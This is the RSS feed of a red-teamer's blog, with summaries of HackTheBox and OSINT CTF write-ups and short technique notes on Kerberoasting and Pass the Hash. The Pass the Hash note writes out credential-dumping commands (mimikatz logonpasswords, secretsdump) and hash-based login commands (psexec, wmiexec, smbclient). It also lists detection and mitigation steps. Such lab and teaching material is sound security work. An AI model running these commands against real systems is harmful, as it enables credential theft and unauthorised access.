<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<title>ethicalhacker.tech</title>
		<link>https://ethicalhacker.tech/</link>
		<description>Recent content on ethicalhacker.tech</description>
		<generator>Hugo</generator>
		<language>en-GB</language>
		
		
		
		
			<lastBuildDate>Wed, 07 May 2025 20:24:00 +0100</lastBuildDate>
		
			<atom:link href="https://ethicalhacker.tech/index.xml" rel="self" type="application/rss+xml" />
			<item>
				<title>HackTheBox - Dog Writeup</title>
				<link>https://ethicalhacker.tech/posts/dog/</link>
				<pubDate>Wed, 07 May 2025 20:24:00 +0100</pubDate>
				<guid>https://ethicalhacker.tech/posts/dog/</guid>
				<description>&lt;p&gt;This machine is an easy rated Linux machine. This writeup will demonstrate how I was able to run commands in the context of the root user. This box involves reading sensitive data found in an exposed git repository leading to access to an admin user on BackdropCMS. With these privileges we are able to find an exploit that allows us to build a malicious module in the form of a web shell. This is used to gain an initial foothold with a reverse shell. Taking a list of users and reusing the password we have will allow logging in as the user johncusack. After accessing this account and observing the sudo permissions, it is seen that it can run a binary called &lt;code&gt;bee&lt;/code&gt; with sudo permission. Using this tool with sudo access allows an attacker to run commands in the context of the root user.&lt;/p&gt;</description>
			</item>
			<item>
				<title>HackTheBox - Administrator Writeup</title>
				<link>https://ethicalhacker.tech/posts/administrator/</link>
				<pubDate>Mon, 05 May 2025 19:27:25 +0100</pubDate>
				<guid>https://ethicalhacker.tech/posts/administrator/</guid>
				<description>&lt;p&gt;This machine is a retired medium rated Windows box. We are given the credentials to a user account that will give us our initial foothold. After our initial scanning we can see the services that are running and we get an easy access point using the olivia account over WinRM. Following on from here, we will need to use SharpHound as a collector for Bloodhound and do some AD enumeration. This will become important as we will need to come back to refer to it several times. In this box we will see the abuse of GenericAll, ForceChangePassword, GenericWrite, Kerberoasting, and DCSync for our AD attack vectors. We will also see some cracking of a password manager file in a psafe3 format. This box required quite a few user pivots before getting to the domain administrator.&lt;/p&gt;</description>
			</item>
			<item>
				<title>HackTheBox - Monitored Writeup</title>
				<link>https://ethicalhacker.tech/posts/monitored/</link>
				<pubDate>Fri, 26 Jul 2024 16:13:25 +0100</pubDate>
				<guid>https://ethicalhacker.tech/posts/monitored/</guid>
				<description>&lt;p&gt;Monitored is a medium rated retired Linux machine on HackTheBox. In this walkthrough I demonstrate how I was able to obtain root access to this machine. This box will require you to use SNMP to get credentials for a disabled account. You will then need to abuse the API to get an authentication token. Next, find the right CVE to steal the administrator&amp;rsquo;s API key. With this key you can start adding users with admin access. Built in functionality can be abused to get a reverse shell. With this reverse shell you can then escalate your privileges by abusing the sudo permissions provided to the user account.&lt;/p&gt;</description>
			</item>
			<item>
				<title>HackTheBox - PermX Writeup</title>
				<link>https://ethicalhacker.tech/posts/permx/</link>
				<pubDate>Mon, 08 Jul 2024 08:38:02 +0100</pubDate>
				<guid>https://ethicalhacker.tech/posts/permx/</guid>
				<description>&lt;p&gt;PermX is an easy rated Linux machine from week 12 of HackTheBox season 5 &amp;ldquo;Anomalies&amp;rdquo;. In this walkthrough, I will demonstrate how I was able to obtain root access to this machine. This box was a standard easy rated box with a privilege escalation vector that required a bit of thinking. Subdomain enumeration uncovers a Chamilo LMS instance vulnerable to CVE-2023-4226, allowing unauthenticated file upload and a reverse shell as www-data. Linpeas reveals credentials in a Chamilo config file, granting SSH access as mtz. A sudoable script using setfacl is abused via a symbolic link to /etc/sudoers, granting mtz unrestricted sudo and root access.&lt;/p&gt;</description>
			</item>
			<item>
				<title>HackTheBox - Blazorized Writeup</title>
				<link>https://ethicalhacker.tech/posts/blazorized/</link>
				<pubDate>Sun, 07 Jul 2024 09:06:44 +0100</pubDate>
				<guid>https://ethicalhacker.tech/posts/blazorized/</guid>
				<description>&lt;p&gt;Blazorized was a medium rated Windows machine from week 11 of HackTheBox season 5 &amp;ldquo;Anomalies&amp;rdquo;. This rating was later changed to hard when it was retired. In this walkthrough, I will demonstrate how I was able to obtain root access to this machine. This box proved to be quite difficult for me and required very good enumeration.&lt;/p&gt;&#xA;&lt;p&gt;Blazorized is a machine running Windows and is functioning as a domain controller. On this machine, we find a Blazor .NET WASM application. We are able to obtain a DLL, use AvaloniaILSpy to read the contents of it, and write a Python script to create a &amp;ldquo;superadmin&amp;rdquo; JWT and access the admin area of the website. From here we will see that we can abuse a SQL injection vulnerability to gain a reverse shell. We then abuse a WriteSPN privilege to pivot to another user using a Kerberoast attack. We will then pivot into another user account by abusing permissions to write a login script that will trigger a reverse shell. Finally, we will abuse a DCSync privilege using mimikatz to dump out the administrator&amp;rsquo;s NTLM hash and get a shell as the administrator.&lt;/p&gt;</description>
			</item>
			<item>
				<title>DamCTF24 - Writeup</title>
				<link>https://ethicalhacker.tech/posts/damctf24/</link>
				<pubDate>Sun, 07 Apr 2024 22:57:03 +0100</pubDate>
				<guid>https://ethicalhacker.tech/posts/damctf24/</guid>
				<description>&lt;p&gt;These writeups are for the OSINT challenges I solved while competing in &lt;a href=&#34;https://ctftime.org/event/2262&#34;&gt;DamCTF 2024&lt;/a&gt; with my team, &lt;a href=&#34;https://ctftime.org/team/287833&#34;&gt;Bonzi_Brigade&lt;/a&gt;. This event took place from 06th April - 08th April. Our team scored 1380 points in total and came 27th out of 207 teams.&lt;/p&gt;&#xA;&lt;h1 id=&#34;asparagus&#34;&gt;asparagus?&lt;/h1&gt;&#xA;&lt;hr&gt;&#xA;&lt;p&gt;&lt;strong&gt;Authors:&lt;/strong&gt; alienfoetus, WholeWheatBagels&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Solves:&lt;/strong&gt; 44&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Last spring break, we took a short trip to see these special flowers! Can you find where we were?&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Challenge image:&lt;/strong&gt;&#xA;&lt;img src=&#34;https://ethicalhacker.tech/images/damctf/asparagus/flowers.jpg&#34; alt=&#34;&#34;&gt;&lt;/p&gt;&#xA;&lt;hr&gt;&#xA;&lt;p&gt;Since the framing of the challenge is the Oregon State University students going on a trip for spring break, I assumed that they would still be in Oregon. I started off by searching for wild purple flowers in Oregon. The ones shown in the screenshot below look to be similar to those found in the provided picture:&lt;/p&gt;</description>
			</item>
			<item>
				<title>UTCTF 2024 - Writeups</title>
				<link>https://ethicalhacker.tech/posts/utctf24/</link>
				<pubDate>Wed, 03 Apr 2024 21:38:20 +0100</pubDate>
				<guid>https://ethicalhacker.tech/posts/utctf24/</guid>
				<description>&lt;p&gt;These writeups are for the OSINT challenges I solved while competing in &lt;a href=&#34;https://ctftime.org/event/2302&#34;&gt;UTCTF 2024&lt;/a&gt; with my team, &lt;a href=&#34;https://ctftime.org/team/287833&#34;&gt;Bonzi_Brigade&lt;/a&gt;. This event took place from 30th March - 01st April. Our team scored 4045 points in total and came 135th out of 854 teams.&lt;/p&gt;&#xA;&lt;h1 id=&#34;osint-1&#34;&gt;OSINT 1&lt;/h1&gt;&#xA;&lt;hr&gt;&#xA;&lt;p&gt;&lt;strong&gt;Author:&lt;/strong&gt; mzone (@mzone on discord)&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Solves:&lt;/strong&gt; 202&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; It seems like companies have document leaks all the time nowadays. I wonder if this company has any. (NOTE: It turns out there&amp;rsquo;s also an actual company named Kakuu in Japan. The real company is not in scope. Please don&amp;rsquo;t try and hack them.)&lt;/p&gt;</description>
			</item>
			<item>
				<title>About</title>
				<link>https://ethicalhacker.tech/about/</link>
				<pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
				<guid>https://ethicalhacker.tech/about/</guid>
				<description>&lt;div class=&#34;section-head&#34;&gt;&#xA;  &lt;span class=&#34;section-head-label&#34;&gt;Background&lt;/span&gt;&#xA;  &lt;div class=&#34;section-head-line&#34;&gt;&lt;/div&gt;&#xA;&lt;/div&gt;&#xA;&lt;p class=&#34;about-p&#34;&gt;Hi, I&#39;m &lt;span class=&#34;accent&#34;&gt;Kyle&lt;/span&gt;. I&#39;ve been interested in computers since I was a teenager; like many others, this started with gaming. This led me to programming and networking. What started as curiosity turned into a computer science degree and a cyber security career. In my professional work, I am a member of a Red Team carrying out offensive security engagements. In my spare time, I like to work on my home lab environment, continue to develop my offensive security skills in my home lab or on platforms like HackTheBox, and I still play video games when time permits.&lt;/p&gt;</description>
			</item>
			<item>
				<title>Kerberoasting</title>
				<link>https://ethicalhacker.tech/notes/kerberoasting/</link>
				<pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
				<guid>https://ethicalhacker.tech/notes/kerberoasting/</guid>
				<description>&lt;h2 id=&#34;what-is-it&#34;&gt;what is it?&lt;/h2&gt;&#xA;&lt;p&gt;Kerberoasting is an Active Directory attack that allows any authenticated domain user to request Kerberos service tickets (TGS) for accounts that have a Service Principal Name (SPN) set. Those tickets are encrypted with the service account&amp;rsquo;s NTLM hash, meaning they can be taken offline and cracked without any further interaction with the domain controller.&lt;/p&gt;&#xA;&lt;p&gt;The attack is particularly effective because SPNs are often set on service accounts with weak passwords, and requesting a TGS is a normal, logged operation that blends in with everyday traffic.&lt;/p&gt;</description>
			</item>
			<item>
				<title>Pass the Hash</title>
				<link>https://ethicalhacker.tech/notes/pass-the-hash/</link>
				<pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
				<guid>https://ethicalhacker.tech/notes/pass-the-hash/</guid>
				<description>&lt;h2 id=&#34;what-is-it&#34;&gt;what is it?&lt;/h2&gt;&#xA;&lt;p&gt;Pass the Hash (PtH) is a technique that uses a captured NTLM hash to authenticate as a user without knowing their plaintext password. Because NTLM authentication uses the hash directly as a credential, an attacker with a valid hash can authenticate to any service that accepts NTLM — SMB, WMI, RDP (in some configs), and more.&lt;/p&gt;&#xA;&lt;h2 id=&#34;requirements&#34;&gt;requirements&lt;/h2&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;A captured NTLM hash (from mimikatz, secretsdump, or similar)&lt;/li&gt;&#xA;&lt;li&gt;Network access to the target&lt;/li&gt;&#xA;&lt;li&gt;Target must accept NTLM authentication (most Windows environments do)&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;h2 id=&#34;attack-steps&#34;&gt;attack steps&lt;/h2&gt;&#xA;&lt;h3 id=&#34;1-obtain-a-hash&#34;&gt;1. obtain a hash&lt;/h3&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;1&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# dump from lsass on a compromised host&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;2&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;mimikatz &lt;span class=&#34;c1&#34;&gt;# sekurlsa::logonpasswords&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;3&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;4&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# remote dump via impacket&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;5&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;secretsdump.py domain/user:password@10.0.0.5&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id=&#34;2-authenticate-with-the-hash&#34;&gt;2. authenticate with the hash&lt;/h3&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;1&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# psexec with hash&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;2&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;psexec.py -hashes :ntlmhash domain/administrator@10.0.0.10&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;3&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;4&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# wmiexec&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;5&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;wmiexec.py -hashes :ntlmhash domain/administrator@10.0.0.10&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;6&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;7&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# smbclient&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;8&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;smbclient.py -hashes :ntlmhash domain/administrator@10.0.0.10&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id=&#34;detection&#34;&gt;detection&lt;/h2&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Event ID &lt;strong&gt;4624&lt;/strong&gt; logon type 3 (network) with NTLM authentication where Kerberos would be expected&lt;/li&gt;&#xA;&lt;li&gt;Mismatched workstation names or unusual source IPs for privileged accounts&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;h2 id=&#34;mitigation&#34;&gt;mitigation&lt;/h2&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Enable &lt;strong&gt;Protected Users&lt;/strong&gt; security group — prevents NTLM auth for member accounts&lt;/li&gt;&#xA;&lt;li&gt;Disable NTLM where possible via GPO (&lt;code&gt;Network security: Restrict NTLM&lt;/code&gt;)&lt;/li&gt;&#xA;&lt;li&gt;Use &lt;strong&gt;Credential Guard&lt;/strong&gt; to protect lsass from memory reads&lt;/li&gt;&#xA;&lt;li&gt;Enforce tiered administration to limit where privileged hashes are cached&lt;/li&gt;&#xA;&lt;/ul&gt;</description>
			</item>
			<item>
				<title>search</title>
				<link>https://ethicalhacker.tech/search/</link>
				<pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
				<guid>https://ethicalhacker.tech/search/</guid>
				<description></description>
			</item>
	</channel>
</rss>
